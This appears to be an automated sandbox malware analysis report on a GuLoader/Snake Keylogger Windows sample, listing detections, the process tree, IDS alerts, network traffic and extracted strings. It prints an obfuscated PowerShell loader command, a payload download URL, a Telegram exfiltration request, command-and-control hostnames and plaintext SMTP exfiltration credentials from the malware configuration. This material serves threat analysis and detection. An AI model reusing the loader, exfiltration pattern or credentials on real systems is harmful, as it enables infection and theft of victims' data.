Windows Analysis Report
uPDwUy9ewY.exe

Overview

General Information

Sample name: uPDwUy9ewY.exe (renamed because original name is a hash value)
Original sample name: 567c3776afcd2c7dfb3b07e4c6dd281c0dcdc770ed2827c9a84cccaf3fe97d6c.exe
Analysis ID: 1631823
MD5: 0425118557aa95ea418a0b15dd072078
SHA1: 9c09bdbe6282db2e5d6d55456df456100c133e33
SHA256: 567c3776afcd2c7dfb3b07e4c6dd281c0dcdc770ed2827c9a84cccaf3fe97d6c
Tags: exe, user-adrian__luca

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • uPDwUy9ewY.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\uPDwUy9ewY.exe" MD5: 0425118557AA95EA418A0B15DD072078)
    • powershell.exe (PID: 7164 cmdline: "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3488 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 2724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "comercial@veyremaagricola.com", "Password": "Com@120613", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Author: Joe Security
Source: 00000005.00000002.2126368645.0000000005712000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000002.00000002.1284819779.000000000A212000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
Source: Process Memory Space: msiexec.exe PID: 3488, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: Process Memory Space: msiexec.exe PID: 3488, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security

System Summary

Source: Network Connection, Author: frack113, Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3488, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49690
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7164, TargetFilename: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)", CommandLine: "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\uPDwUy9ewY.exe", ParentImage: C:\Users\user\Desktop\uPDwUy9ewY.exe, ParentProcessId: 7000, ParentProcessName: uPDwUy9ewY.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)", ProcessId: 7164, ProcessName: powershell.exe
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2724, ProcessName: svchost.exe
Timestamp                        SID      Severity  Classtype                Source IP    Source Port  Destination IP   Destination Port  Protocol
2025-03-07T16:20:58.171618+0100  2803305  3         Unknown Traffic          192.168.2.8  49694        104.21.80.1      443               TCP
2025-03-07T16:21:01.488549+0100  2803305  3         Unknown Traffic          192.168.2.8  49696        104.21.80.1      443               TCP
2025-03-07T16:21:22.728681+0100  2803305  3         Unknown Traffic          192.168.2.8  49708        104.21.80.1      443               TCP

2025-03-07T16:20:52.107397+0100  2803274  2         Potentially Bad Traffic  192.168.2.8  49692        132.226.247.73   80                TCP
2025-03-07T16:20:55.498049+0100  2803274  2         Potentially Bad Traffic  192.168.2.8  49692        132.226.247.73   80                TCP
2025-03-07T16:20:58.982448+0100  2803274  2         Potentially Bad Traffic  192.168.2.8  49695        132.226.247.73   80                TCP
2025-03-07T16:21:02.294940+0100  2803274  2         Potentially Bad Traffic  192.168.2.8  49697        132.226.247.73   80                TCP
2025-03-07T16:21:05.810613+0100  2803274  2         Potentially Bad Traffic  192.168.2.8  49699        132.226.247.73   80                TCP

2025-03-07T16:20:44.422857+0100  2803270  2         Potentially Bad Traffic  192.168.2.8  49690        142.250.184.238  443               TCP

2025-03-07T16:21:26.055869+0100  1810007  1         Potentially Bad Traffic  192.168.2.8  49709        149.154.167.220  443               TCP

AV Detection

Source: uPDwUy9ewY.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe, Avira: detection malicious, Label: TR/Injector.bjagk
Source: 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "comercial@veyremaagricola.com", "Password": "Com@120613", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe, ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe, Virustotal: Detection: 72%
Source: uPDwUy9ewY.exe, Virustotal: Detection: 72%
Source: uPDwUy9ewY.exe, ReversingLabs: Detection: 65%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability

Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: uPDwUy9ewY.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49693 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49696 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49698 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49690 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49691 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, Code function: 0_2_00405E6B FindFirstFileA,FindClose, 0_2_00405E6B
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, Code function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405427
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, Code function: 0_2_00402647 FindFirstFileA, 0_2_00402647
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, File opened: C:\Users\user
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 4x nop then jmp 02DBF45Dh, 5_2_02DBF2C0
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 4x nop then jmp 02DBF45Dh, 5_2_02DBF4AC
Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 4x nop then jmp 02DBFC19h, 5_2_02DBF974

Networking

Source: Network traffic, Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49709 -> 149.154.167.220:443
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:53:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 104.21.80.1
Source: Joe Sandbox View, IP Address: 132.226.247.73
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, DNS query: name: checkip.dyndns.org
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49695 -> 132.226.247.73:80
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49692 -> 132.226.247.73:80
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49699 -> 132.226.247.73:80
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49697 -> 132.226.247.73:80
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49696 -> 104.21.80.1:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49690 -> 142.250.184.238:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49694 -> 104.21.80.1:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.80.1:443
Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: drive.google.com
Source: global traffic, DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic, DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic, DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 07 Mar 2025 15:21:25 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org/
Source: svchost.exe, 00000004.00000002.2128766647.00000233FD600000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.ver)
Source: qmgr.db.4.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr, String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: uPDwUy9ewY.exe, uPDwUy9ewY.exe.2.dr, String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: uPDwUy9ewY.exe, uPDwUy9ewY.exe.2.dr, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1255613084.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000002.00000002.1255613084.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore6lB/r
Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a
Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021EDF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021EDF000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: msiexec.exe, 00000005.00000002.2142843540.0000000021EDA000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://chrome.google.com/webstore?hl=enlB/r
Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000005.00000002.2141049620.00000000212F0000.00000004.00001000.00020000.00000000.sdmp, String found in binary or memory: https://drive.google.com/uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n
Source: msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://drive.google.com/uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6nCz
Source: msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://drive.google.com/uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6niz%
Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000005.00000002.2129804635.00000000062A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/F
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2129804635.0000000006277000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download
            Source: msiexec.exe, 00000005.00000002.2129804635.000000000628E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=downloadP
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
            Source: svchost.exe, 00000004.00000003.1203467438.00000233FD4A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.1254568952.0000000000A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
            Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E23000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E23000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021E0B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 00000005.00000003.1412385641.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353014568.00000000062A7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1353093478.00000000062A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
